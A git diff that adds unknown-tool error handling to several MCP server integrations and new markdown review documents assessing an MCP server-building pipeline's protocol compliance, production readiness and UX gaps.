a/mcp-diagrams/mcp-servers/squarespace/src/index.ts +++ b/mcp-diagrams/mcp-servers/squarespace/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -255,6 +257,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/toast/src/index.ts b/mcp-diagrams/mcp-servers/toast/src/index.ts index 05b587e..c660091 100644 --- a/mcp-diagrams/mcp-servers/toast/src/index.ts +++ b/mcp-diagrams/mcp-servers/toast/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -388,6 +390,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } + try { const result = await handleTool(client, name, args || {}); return { diff --git a/mcp-diagrams/mcp-servers/touchbistro/src/index.ts b/mcp-diagrams/mcp-servers/touchbistro/src/index.ts index 87154a6..3ddd7bf 100644 --- a/mcp-diagrams/mcp-servers/touchbistro/src/index.ts +++ b/mcp-diagrams/mcp-servers/touchbistro/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -363,6 +365,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/trello/src/index.ts b/mcp-diagrams/mcp-servers/trello/src/index.ts index d471b6d..27f59b5 100644 --- a/mcp-diagrams/mcp-servers/trello/src/index.ts +++ b/mcp-diagrams/mcp-servers/trello/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -401,6 +403,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/wave/src/index.ts b/mcp-diagrams/mcp-servers/wave/src/index.ts index 2291d98..f6fd7d1 100644 --- a/mcp-diagrams/mcp-servers/wave/src/index.ts +++ b/mcp-diagrams/mcp-servers/wave/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -521,6 +523,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/wrike/src/index.ts b/mcp-diagrams/mcp-servers/wrike/src/index.ts index 6f86b52..e31678c 100644 --- a/mcp-diagrams/mcp-servers/wrike/src/index.ts +++ b/mcp-diagrams/mcp-servers/wrike/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -346,6 +348,12 @@ async function main() { // Handle tool calls server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-diagrams/mcp-servers/zendesk/src/index.ts b/mcp-diagrams/mcp-servers/zendesk/src/index.ts index 84b94cb..e05c944 100644 --- a/mcp-diagrams/mcp-servers/zendesk/src/index.ts +++ b/mcp-diagrams/mcp-servers/zendesk/src/index.ts @@ -4,6 +4,8 @@ import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js" import { CallToolRequestSchema, ListToolsRequestSchema, + McpError, + ErrorCode, } from "@modelcontextprotocol/sdk/types.js"; // ============================================ @@ -331,6 +333,12 @@ async function main() { server.setRequestHandler(CallToolRequestSchema, async (request) => { const { name, arguments: args } = request.params; + + // Validate tool exists (MCP spec requires proper error for unknown tools) + const knownTools = tools.map(t => t.name); + if (!knownTools.includes(name)) { + throw new McpError(ErrorCode.MethodNotFound, `Unknown tool: ${name}`); + } try { const result = await handleTool(client, name, args || {}); diff --git a/mcp-factory-reviews/BOSS-SYNTHESIS.md b/mcp-factory-reviews/BOSS-SYNTHESIS.md new file mode 100644 index 0000000..77127ea --- /dev/null +++ b/mcp-factory-reviews/BOSS-SYNTHESIS.md @@ -0,0 +1,33 @@ +# Boss-Level Final Review Synthesis + +## Universal Agreement (All 3 Bosses) +1. **LLM re-serialization is the #1 fragility** — APP_DATA depends on LLM generating valid JSON. 5-10% parse failure rate. +2. **Tool routing testing is theater** — fixture files exist but never run through an actual LLM +3. **MCP Apps protocol is live** (Jan 26 2026) — our pattern is now legacy +4. **SDK must be ^1.26.0** — security fix GHSA-345p-7cg4-v4c7 released today +5. **escapeHtml is DOM-based and slow** — needs regex replacement + +## Critical Code Bugs (Mei) +- Circuit breaker race condition in half-open state +- Retry lacking jitter (thundering herd) +- HTTP session memory leak (no TTL) +- OAuth token refresh thundering herd (no mutex) + +## Cross-Skill Contradictions (Alexei) +- Phase numbering: 5 vs 7 mismatch +- Content annotations planned in analyzer, never built in builder +- Capabilities declare resources/prompts but none implemented +- Data shape contract gap between tools and apps +- 18 total cross-skill issues mapped + +## UX/AI Gaps (Kofi) +- No "updating" state between data refreshes +- sendToHost documented but not wired on host side +- Multi-intent and correction handling missing +- No production quality monitoring +- 7 quality drop points in user journey mapped + +## Overall Ratings +- Alexei: 8.5/10 +- Mei: "NOT READY FOR PRODUCTION AT A BANK" but 2-3 weeks from it +- Kofi: Infrastructure is production-grade, AI interaction layer is the gap diff --git a/mcp-factory-reviews/SYNTHESIS.md b/mcp-factory-reviews/SYNTHESIS.md new file mode 100644 index 0000000..1311261 --- /dev/null +++ b/mcp-factory-reviews/SYNTHESIS.md @@ -0,0 +1,158 @@ +# MCP Factory Review — Synthesis & Debate Summary + +**Date:** February 4, 2026 +**Reviewers:** Alpha (Protocol), Beta (Production), Gamma (AI/UX) +**Total findings:** ~48 unique recommendations across 3 reviews + +--- + +## Where All Three Agree (The No-Brainers) + +### 1. Testing/QA Is the Weakest Skill +- **Alpha:** No MCP protocol compliance testing at all +- **Beta:** "Everything is manual. 30 servers × 10 apps = 300 things to manually verify. This doesn't scale." +- **Gamma:** "It's a manual checklist masquerading as a testing framework." No quantitative metrics, no regression baselines, no automated tests. + +**Verdict:** QA needs a complete overhaul — automated test framework, quantitative metrics, fixture data, regression baselines. + +### 2. MCP Spec Has Moved Past Our Skills +- **Alpha:** Missing structuredContent, outputSchema, Elicitation, Tasks — 3 major spec features since June 2025 +- **Beta:** APP_DATA format is fragile (LLMs produce bad JSON), should use proper structured output +- **Gamma:** Official MCP Apps extension (Jan 2026) with `ui://` URIs makes our iframe/postMessage pattern semi-obsolete + +**Verdict:** Our skills are built against ~March 2025 spec. Need to update for the November 2025 spec + January 2026 MCP Apps extension. + +### 3. Tool Descriptions Are Insufficient +- **Alpha:** Missing `title` field, no outputSchema declarations +- **Beta:** Descriptions are too verbose for token budgets +- **Gamma:** Need "do NOT use when" disambiguation — reduces misrouting ~30% + +**Verdict:** Tool descriptions are the #1 lever for quality. Add negative disambiguation, add title field, optimize for token budget. + +### 4. Apps Are Display-Only +- **Beta:** No interactive patterns noted as a gap +- **Gamma:** "No drag-and-drop, no inline editing, no search-within-app. Apps feel like screenshots, not tools." + +**Verdict:** Need at minimum: client-side sort, filter, copy-to-clipboard, expand/collapse. + +--- + +## Unique High-Impact Insights Per Agent + +### Alpha's Gems (Protocol): +- **SDK v1.26.0 is current** — we should pin `^1.25.0` minimum, not `^1.0.0` +- **Streamable HTTP** is the recommended production transport — we only cover stdio +- **structuredContent + outputSchema** is THE proper way to send typed data to apps +- **SDK v2 split** coming Q1 2026 — need migration plan + +### Beta's Gems (Production): +- **Token budget is the real bottleneck**, not memory — 50+ tools = 10K+ tokens just in definitions +- **Circuit breaker pattern is missing** — retry without circuit breaker amplifies failures +- **No request timeouts** — a hanging API blocks the tool indefinitely +- **MCP Gateway pattern** — industry standard for managing multiple servers at scale +- **OpenAPI-to-MCP automation** — tools exist to auto-generate servers from specs (10x speedup potential) +- **Pipeline resumability** — if an agent crashes mid-phase, there's no checkpoint to resume from + +### Gamma's Gems (AI/UX): +- **"Do NOT use when" in tool descriptions** — single highest-impact improvement per Paragon research +- **WCAG contrast failure** — #96989d secondary text fails AA at 3.7:1 (needs 4.5:1, fix: #b0b2b8) +- **Quantitative QA metrics** — Tool Correctness Rate, Task Completion Rate, not just pass/fail checklists +- **Test data fixtures** — standardized sample data per app type, including edge cases and adversarial data +- **System prompts need structured tool routing rules**, not just "describe capabilities" +- **BackstopJS for visual regression** — pixel-diff screenshot comparison + +--- + +## The Debate: Where They Diverge + +### Lazy Loading: Valuable or Misguided? +- **Alpha:** Lazy loading is good, optimize further with selective tool registration +- **Beta:** "Lazy loading optimizes the wrong thing — token budget is the bottleneck" +- **Gamma:** "Cap active tools at 15-20 per interaction" + +**Resolution:** Lazy loading helps with startup time but doesn't solve the token problem. Need BOTH: lazy loading for code + dynamic tool filtering for context. Only surface tools relevant to the current conversation. + +### APP_DATA Pattern: Fix or Replace? +- **Alpha:** It's proprietary and conflated with MCP protocol. Should use structuredContent. +- **Beta:** It's fragile — LLMs produce bad JSON in HTML comments. Need robust parsing. +- **Gamma:** Official MCP Apps extension supersedes it. + +**Resolution:** Short-term: make the parser more robust (Beta's point). Medium-term: adopt structuredContent as the data transport (Alpha's point). Long-term: support official MCP Apps protocol alongside our custom one (Gamma's point). + +### How Much Testing Is Enough? +- **Alpha:** Add protocol compliance testing (MCP Inspector) +- **Beta:** Need Jest + Playwright automation. Manual doesn't scale. +- **Gamma:** Need quantitative metrics (>95% tool correctness rate) + regression baselines + +**Resolution:** All three are right at different layers. Build a 4-tier automated test stack: MCP Inspector (protocol) → Jest (unit) → Playwright (visual) → Fixture-based routing tests (functional). + +--- + +## Consolidated Priority Actions + +### TIER 1 — Before Shipping Next Server (1-2 days) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 1 | Fix WCAG contrast: #96989d → #b0b2b8 in all app templates | Gamma | 30 min | +| 2 | Add request timeouts (AbortController, 30s default) to server template | Beta | 30 min | +| 3 | Add "do NOT use when" disambiguation to tool description formula | Gamma | 2 hrs | +| 4 | Pin SDK to `^1.25.0`, Zod to `^3.25.0` | Alpha | 15 min | +| 5 | Add `title` field to all tool definitions | Alpha | 1 hr | +| 6 | Add circuit breaker to API client template | Beta | 2 hrs | +| 7 | Add structured logging to server template | Beta | 1 hr | +| 8 | Add error boundaries to all app templates | Gamma | 1 hr | + +### TIER 2 — Before the 30-Server Push (1 week) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 9 | Add structuredContent + outputSchema to server builder | Alpha | 4 hrs | +| 10 | Build automated QA framework (Jest + Playwright) | Beta+Gamma | 2 days | +| 11 | Create test data fixtures library (per app type) | Gamma | 4 hrs | +| 12 | Add quantitative QA metrics (tool correctness, task completion) | Gamma | 4 hrs | +| 13 | Add integration validation script (cross-reference all 4 files) | Beta | 3 hrs | +| 14 | Add interactive patterns to apps (sort, filter, copy, expand/collapse) | Gamma | 1 day | +| 15 | Improve system prompt engineering (routing rules, few-shot examples, negatives) | Gamma | 4 hrs | +| 16 | Add Streamable HTTP transport option | Alpha | 4 hrs | + +### TIER 3 — During/After 30-Server Push (2-4 weeks) + +| # | Action | Source | Effort | +|---|--------|--------|--------| +| 17 | Support official MCP Apps extension (`_meta.ui.resourceUri`) | Alpha+Gamma | 1 week | +| 18 | Implement dynamic tool filtering (context-aware registration) | Beta+Gamma | 3 days | +| 19 | Add Elicitation support | Alpha | 2 days | +| 20 | Explore OpenAPI-to-MCP automation for existing servers | Beta | 3 days | +| 21 | Add visual regression baselines (BackstopJS) | Gamma | 2 days | +| 22 | Add data visualization primitives (line charts, sparklines, donuts) | Gamma | 3 days | +| 23 | Implement MCP gateway layer for LocalBosses | Beta | 1-2 weeks | +| 24 | Pipeline resumability (checkpoints, idempotent phases) | Beta | 1 day | +| 25 | Add accessibility testing (axe-core, keyboard nav) | Gamma | 2 days | + +### TIER 4 — Future / Nice-to-Have + +| # | Action | Source | +|---|--------|--------| +| 26 | SDK v2 migration plan | Alpha | +| 27 | Non-REST API support (GraphQL, SOAP) | Beta | +| 28 | Bidirectional app communication (sendToHost) | Gamma | +| 29 | Tasks (async operations) support | Alpha | +| 30 | Centralized secret management | Beta | +| 31 | App micro-interactions (staggered animations) | Gamma | +| 32 | Multi-tenant considerations | Beta | + +--- + +## Key Numbers + +- **3 major MCP spec features missing** (structuredContent, Elicitation, Tasks) +- **30% misrouting reduction** possible with "do NOT use when" disambiguation +- **10K+ tokens** consumed by 50+ tool definitions (the real bottleneck) +- **3.7:1 contrast ratio** on secondary text (needs 4.5:1 for WCAG AA) +- **300+ manual test cases** needed for 30 servers (need automation) +- **SDK v1.26.0** is current (we reference v1.x vaguely) + +--- + +*All three reviews are saved in `mcp-factory-reviews/` for reference.* diff --git a/mcp-factory-reviews/alpha-protocol-review.md b/mcp-factory-reviews/alpha-protocol-review.md new file mode 100644 index 0000000..d43c4fc --- /dev/null +++ b/mcp-factory-reviews/alpha-protocol-review.md @@ -0,0 +1,470 @@ +# Agent Alpha — MCP Protocol & Standards Review + +**Date:** 2026-02-04 +**Reviewer:** Agent Alpha (MCP Protocol & Standards Expert) +**Scope:** MCP-FACTORY.md + 5 skills (mcp-api-analyzer, mcp-server-builder, mcp-app-designer, mcp-localbosses-integrator, mcp-qa-tester) +**Spec Versions Reviewed Against:** MCP 2025-06-18, MCP 2025-11-25 (current), TS SDK v1.26.0 (current stable), TS SDK v2 (pre-alpha) + +--- + +## Executive Summary + +1. **The skills are built against an outdated SDK surface area.** The current `@modelcontextprotocol/sdk` is at **v1.26.0** (not "v1.x+" as vaguely stated), and the v2 SDK (pre-alpha, targeting Q1 2026) splits into `@modelcontextprotocol/server` + `@modelcontextprotocol/client`. The skills reference `"^1.0.0"` in package.json — this will work but isn't pinned strategically. + +2. **Three major MCP features from the 2025-06-18 and 2025-11-25 specs are completely missing:** `outputSchema` / `structuredContent` (structured tool outputs), **Elicitation** (server-requested user input), and **Tasks** (async long-running operations). These are significant omissions for a Feb 2026 pipeline. + +3. **Transport coverage is stdio-only.** The spec now defines **Streamable HTTP** as the recommended remote transport, and legacy SSE is deprecated. Our server template only shows `StdioServerTransport` — this is fine for Claude Desktop but severely limits deployment patterns. + +4. **Tool metadata is incomplete.** The 2025-11-25 spec added `title`, `icons`, and `outputSchema` to the Tool definition. Our skills only cover `annotations` (readOnlyHint etc.) — we're missing the new first-class fields. + +5. **The "MCP Apps" pattern is entirely custom (LocalBosses-specific).** This is NOT the same as MCP `structuredContent`. The skills conflate our proprietary `APP_DATA` block system with MCP protocol features. This should be clearly documented as a LocalBosses extension, not MCP standard. + +--- + +## Per-Skill Reviews + +### 1. MCP API Analyzer (`mcp-api-analyzer`) + +**Overall Grade: B+** — Solid analysis framework, but missing modern spec awareness. + +#### Issues: + +**CRITICAL — Missing `outputSchema` planning:** +The tool inventory section defines `inputSchema` annotations but never plans for `outputSchema`. Since MCP 2025-06-18, tools can declare output schemas for structured content. The analysis template should include a "Response Schema" field per tool that captures the expected output structure. This feeds directly into `structuredContent` at build time. + +**Action:** Add to Section 6 (Tool Inventory) template: +```markdown +- **Output Schema:** `{ data: Contact[], meta: { total, page, pageSize } }` +``` + +**MODERATE — Missing Elicitation candidate identification:** +The MCP 2025-06-18 spec introduced elicitation — servers can request user input mid-flow. The analyzer should identify endpoints/flows that would benefit from interactive elicitation (e.g., "Which account do you want to connect?" during auth, "Confirm before deleting?" for destructive ops). This is a new category of analysis. + +**Action:** Add Section 7b: "Elicitation Candidates" — flows where the server should request user input. + +**MODERATE — Tool naming convention mismatch:** +The skill mandates `snake_case` (`list_contacts`), which is fine and valid per spec. But the 2025-11-25 spec now formally documents tool naming guidance that also allows `camelCase` and `dot.notation` (e.g., `admin.tools.list`). The dot notation is useful for namespacing tool groups. Consider documenting dot notation as an alternative for large APIs. + +**MINOR — Missing `title` field planning:** +The 2025-11-25 spec added an optional `title` field to tools (human-readable display name, separate from the machine-oriented `name`). The analyzer should capture a human-friendly title for each tool. + +**MINOR — Content annotations not planned:** +MCP content (text, images) can now carry `audience` (["user", "assistant"]) and `priority` (0.0-1.0) annotations. These should be planned during analysis — some tool outputs are user-facing (show in UI) vs assistant-facing (feed back to LLM). + +#### What's Good: +- Excellent annotation decision tree (GET→readOnly, DELETE→destructive, etc.) +- Strong app candidate selection criteria +- Good tool description formula ("What it does. What it returns. When to use it.") +- Practical pagination pattern documentation + +--- + +### 2. MCP Server Builder (`mcp-server-builder`) + +**Overall Grade: B-** — Functional but architecturally dated. Multiple spec gaps. + +#### Issues: + +**CRITICAL — Missing `outputSchema` and `structuredContent` in tool definitions:** +Since MCP 2025-06-18, tools SHOULD declare an `outputSchema` and return results via `structuredContent` alongside the `content` text fallback. Our template only returns: +```typescript +return { content: [{ type: "text", text: JSON.stringify(result, null, 2) }] }; +``` + +It should return: +```typescript +return { + content: [{ type: "text", text: JSON.stringify(result, null, 2) }], + structuredContent: result, // The actual typed object +}; +``` + +And the tool definition should include: +```typescript +{ + name: "list_contacts", + title: "List Contacts", // NEW in 2025-11-25 + description: "...", + inputSchema: { ... }, + outputSchema: { // NEW in 2025-06-18 + type: "object", + properties: { + data: { type: "array", items: { ... } }, + meta: { type: "object", ... } + } + }, + annotations: { ... } +} +``` + +This is a **fundamental** protocol compliance issue. Without `structuredContent`, clients that expect typed responses will fall back to parsing text — fragile and error-prone. + +**CRITICAL — Transport is stdio-only:** +The server template only shows `StdioServerTransport`. The MCP 2025-11-25 spec defines two standard transports: +1. **stdio** — for local subprocess spawning (Claude Desktop, Cursor) +2. **Streamable HTTP** — for remote/production servers (recommended for scalability) + +Legacy SSE is deprecated. The builder skill should provide BOTH transport patterns: +```typescript +// stdio (default for local use) +import { StdioServerTransport } from "@modelcontextprotocol/sdk/server/stdio.js"; + +// Streamable HTTP (for remote deployment) +import { StreamableHTTPServerTransport } from "@modelcontextprotocol/sdk/server/streamableHttp.js"; +``` + +At minimum, the README should document how to add Streamable HTTP for production deployment. + +**CRITICAL — Missing `title` field on tools:** +The 2025-11-25 spec added `title` as a first-class tool property for human-readable display. Our skills never set it. Every tool should have: +```typescript +{ + name: "list_contacts", + title: "List Contacts", // Human-readable, shown in UIs + ... +} +``` + +**MODERATE — Error handling doesn't distinguish Protocol Errors vs Tool Execution Errors:** +The MCP spec now (clarified in 2025-11-25) formally distinguishes: +- **Protocol Errors**: JSON-RPC error codes (-32600, -32601, -32602, -32603) for structural issues +- **Tool Execution Errors**: `isError: true` in the result for business/API failures + +The spec explicitly states that **input validation errors should be Tool Execution Errors** (not Protocol Errors) to enable LLM self-correction. Our Zod validation errors are correctly returned as Tool Execution Errors (good), but we don't document this distinction or handle it intentionally. + +**MODERATE — Missing resource_link in tool results:** +Tools can now return `resource_link` content items, pointing to MCP Resources for additional context. For API tools that return entities, returning a resource link allows the client to subscribe to updates: +```typescript +{ + type: "resource_link", + uri: `service://contacts/${contact.id}`, + name: contact.name, + mimeType: "application/json" +} +``` + +**MODERATE — SDK version pinning is vague:** +`"@modelcontextprotocol/sdk": "^1.0.0"` could resolve to v1.0.0 (ancient) or v1.26.0 (current). Should be `"^1.25.0"` minimum to get 2025-11-25 spec support including tasks, icons, and elicitation fixes. + +**MODERATE — No mention of Zod v4 compatibility:** +The SDK v1.x now imports from `zod/v4` internally but maintains backwards compatibility with Zod v3.25+. Our template uses `zod ^3.22.4` — this should be updated to `^3.25.0` minimum or note the Zod v4 migration path. + +**MODERATE — No capabilities declaration for features:** +The server initialization only declares `{ capabilities: { tools: {} } }`. If we plan to use resources, prompts, or logging, these capabilities MUST be declared at init: +```typescript +const server = new Server( + { name: `${MCP_NAME}-mcp`, version: MCP_VERSION }, + { + capabilities: { + tools: { listChanged: false }, + resources: {}, // if serving resources + prompts: {}, // if serving prompts + logging: {}, // for structured logging + } + } +); +``` + +**MINOR — Missing `icons` on tools:** +The 2025-11-25 spec allows tools to declare icons for UI display. Low priority but nice for rich clients. + +**MINOR — Missing JSON Schema 2020-12 awareness:** +The 2025-11-25 spec establishes JSON Schema 2020-12 as the default dialect. Our Zod-to-JSON-Schema conversion should be validated against this. + +#### What's Good: +- Clean modular architecture with lazy loading +- Solid API client pattern with retry/rate-limit logic +- Good Zod validation patterns +- Quality gate checklist is comprehensive + +--- + +### 3. MCP App Designer (`mcp-app-designer`) + +**Overall Grade: B** — Well-crafted UI system, but conceptually disconnected from MCP protocol. + +#### Issues: + +**CRITICAL — Conflation of LocalBosses apps with MCP protocol:** +The entire app system (postMessage, polling, APP_DATA blocks) is a **proprietary LocalBosses pattern**, NOT an MCP protocol feature. The skill should be explicit about this: +- MCP's `structuredContent` is the protocol-level structured output +- LocalBosses' APP_DATA rendering is a client-side UI layer that CONSUMES MCP structured content +- These are different layers and should not be confused + +The skill should document how `structuredContent` from MCP tools feeds into the app rendering pipeline. + +**MODERATE — No integration with MCP `structuredContent`:** +The app template receives data via `postMessage` with type `mcp_app_data`. But the actual data source should be MCP tool results with `structuredContent`. The architecture section should show how LocalBosses parses `structuredContent` from tool results and routes it to the appropriate app via postMessage. + +**MODERATE — Missing Resource subscription pattern:** +MCP Resources support subscriptions (clients can subscribe to resource changes and get notifications). Apps could subscribe to resources for real-time updates instead of polling. This is a more MCP-native pattern than the 3-second polling interval. + +**MINOR — App template doesn't handle `resource_link` content:** +If MCP tools return `resource_link` items, the app system should be able to follow those links to fetch additional data. + +#### What's Good: +- Excellent dark theme design system with clear tokens +- 8 app type templates are comprehensive and well-designed +- Three-state rendering (loading/empty/data) is solid +- Responsive design requirements are practical +- Self-contained HTML pattern is pragmatic + +--- + +### 4. MCP LocalBosses Integrator (`mcp-localbosses-integrator`) + +**Overall Grade: B** — Solid integration guide, but the system prompt approach bypasses MCP's native features. + +#### Issues: + +**CRITICAL — APP_DATA block format bypasses MCP protocol:** +The `` pattern works, but it's embedding structured data in LLM-generated text, which is fragile. The proper MCP approach would be: +1. LLM calls an MCP tool +2. Tool returns `structuredContent` with typed data +3. Client (LocalBosses) receives typed data natively +4. Client routes data to the appropriate app + +Instead, we're asking the LLM to generate JSON inside HTML comments, which is: +- Error-prone (LLMs can produce invalid JSON) +- Not validated against any schema +- Not leveraging MCP's `outputSchema` validation +- Duplicating data (once in text for the user, once in the APP_DATA block) + +**MODERATE — System prompt engineering could leverage MCP Prompts:** +MCP has a first-class `prompts` capability. The system prompts for each channel could be registered as MCP Prompt resources, making them discoverable and versionable through the protocol rather than hardcoded in route.ts. + +**MODERATE — No mention of MCP Roots:** +MCP Roots let clients inform servers about workspace/project scope. For a multi-channel system like LocalBosses, roots could be used to scope which service's data is relevant in each channel. + +**MINOR — Intake questions could use MCP Elicitation:** +The app intake system (asking users questions before showing data) maps directly to MCP's elicitation capability. Instead of a custom intake system, the server could use `elicitation/create` to request initial parameters from the user. + +#### What's Good: +- Clear file-by-file integration guide +- Cross-reference verification checklist is essential +- Complete example (Calendly) is helpful +- System prompt engineering guidelines are practical + +--- + +### 5. MCP QA Tester (`mcp-qa-tester`) + +**Overall Grade: B+** — Thorough testing framework, but missing protocol-level validation. + +#### Issues: + +**CRITICAL — No MCP protocol compliance testing:** +The testing layers cover static analysis, visual testing, functional testing, and API testing — but never test MCP protocol compliance itself. Missing tests: +- Does the server respond correctly to `tools/list`? +- Does every tool return valid `structuredContent` matching its `outputSchema`? +- Does the server handle `initialize` → `initialized` lifecycle correctly? +- Are `notifications/tools/list_changed` sent when appropriate? +- Do error responses use correct JSON-RPC error codes? + +**Action:** Add "Layer 0: MCP Protocol Compliance" testing: +```bash +# Use MCP Inspector for protocol testing +npx @modelcontextprotocol/inspector stdio node dist/index.js +``` + +The [MCP Inspector](https://github.com/modelcontextprotocol/inspector) is the official tool for this — it should be the first thing we run. + +**MODERATE — No `structuredContent` validation:** +If tools declare `outputSchema`, the spec says "Servers MUST provide structured results that conform to this schema." QA should validate every tool's actual output against its declared schema. + +**MODERATE — Missing transport testing:** +QA only tests the app/UI layer. It should also test: +- stdio transport: Can the server be launched as a subprocess and respond to JSON-RPC? +- (If Streamable HTTP added): Can the server handle HTTP POST/GET, session management, SSE streams? + +**MINOR — No sampling/elicitation testing:** +If servers implement sampling or elicitation, these need test scenarios. + +**MINOR — Automated script is bash-only:** +The QA script could leverage the MCP Inspector CLI for automated protocol testing rather than just checking file existence. + +#### What's Good: +- 5-layer testing model is comprehensive +- Visual testing with Peekaboo/Gemini is creative +- Thread lifecycle testing is thorough +- Common issues & fixes table is practical +- Test report template is well-structured + +--- + +## Research Findings: What's New/Changed + +### MCP Spec Versions (timeline): +| Version | Date | Key Features | +|---------|------|-------------| +| 2024-11-05 | Nov 2024 | Initial spec (tools, resources, prompts, sampling) | +| 2025-03-26 | Mar 2025 | Streamable HTTP transport, annotations (readOnlyHint etc.) | +| **2025-06-18** | **Jun 2025** | **structuredContent, outputSchema, Elicitation, OAuth 2.0, resource_link** | +| **2025-11-25** | **Nov 2025** | **Tasks (async), icons, title field, URL elicitation, tool naming guidance, incremental OAuth scope** | + +### TypeScript SDK Status (Feb 2026): +- **v1.26.0** (released Feb 4, 2026) — current stable, implements 2025-11-25 spec +- **v2 pre-alpha** (targeting Q1 2026 stable) — BREAKING: splits into `@modelcontextprotocol/server` + `@modelcontextprotocol/client`, uses Zod v4, adds middleware packages (Express, Hono, Node HTTP) +- v1.x will receive bug fixes for 6+ months after v2 ships + +### Features We're Completely Ignoring: + +1. **`structuredContent` + `outputSchema`** (2025-06-18) + - Tools can declare typed output schemas + - Results include both `content` (text fallback) and `structuredContent` (typed JSON) + - Clients validate structured output against the schema + - **Impact: HIGH** — This is the proper way to send typed data to our apps + +2. **Elicitation** (2025-06-18, enhanced 2025-11-25) + - Form mode: Server requests structured user input via JSON Schema forms + - URL mode: Server directs user to external URL for sensitive operations (OAuth, payments) + - **Impact: HIGH** — Replaces our custom intake system, enables mid-tool user interaction + +3. **Tasks** (2025-11-25, experimental) + - Long-running tool calls become tasks that can be polled/resumed + - Enables "call now, fetch later" pattern + - **Impact: MODERATE** — Useful for slow API calls, batch operations + +4. **Tool `title` + `icons`** (2025-11-25) + - Human-readable display name separate from machine name + - Icon arrays for UI rendering + - **Impact: LOW** — Nice for rich clients + +5. **Content annotations** (`audience`, `priority`) + - Content blocks can specify intended audience (user vs assistant) + - Priority hints for UI rendering order + - **Impact: LOW** — Useful for controlling what the user sees vs what feeds back to LLM + +6. **Streamable HTTP transport** (2025-03-26) + - HTTP POST/GET with optional SSE streaming + - Session management via `MCP-Session-Id` header + - Resumability via `Last-Event-ID` + - **Impact: MODERATE** — Needed for remote/production deployment, not just local stdio + +7. **MCP Resources as tool output** (`resource_link`) + - Tools can return links to subscribable resources + - **Impact: LOW** for now, but enables real-time data patterns + +8. **MCP Registry** (GA targeting soon) + - Central index of MCP servers + - Server identity via `.well-known` URLs + - **Impact: LOW** for our internal use, but relevant if publishing servers + +--- + +## Priority Recommendations (Ranked by Impact) + +### P0 — Must Fix (blocks Feb 2026 compliance) + +**1. Add `structuredContent` + `outputSchema` to server builder** +- Every tool should declare an `outputSchema` +- Every tool result should include both `content` and `structuredContent` +- This is THE most impactful change — it's the standard way to return typed data +- Directly benefits the app system (structured data replaces text parsing) + +**2. Add `title` field to all tool definitions** +- Simple change, required by modern clients (VS Code, Claude Desktop) +- `title: "List Contacts"` alongside `name: "list_contacts"` + +**3. Pin SDK version to `^1.25.0` minimum** +- Ensures 2025-11-25 spec support +- Update Zod peer dep to `^3.25.0` + +### P1 — Should Fix (significant quality improvement) + +**4. Add Streamable HTTP transport option to server builder** +- Provide both stdio and HTTP transport patterns +- README should document remote deployment +- Doesn't need to replace stdio, just offer it as an option + 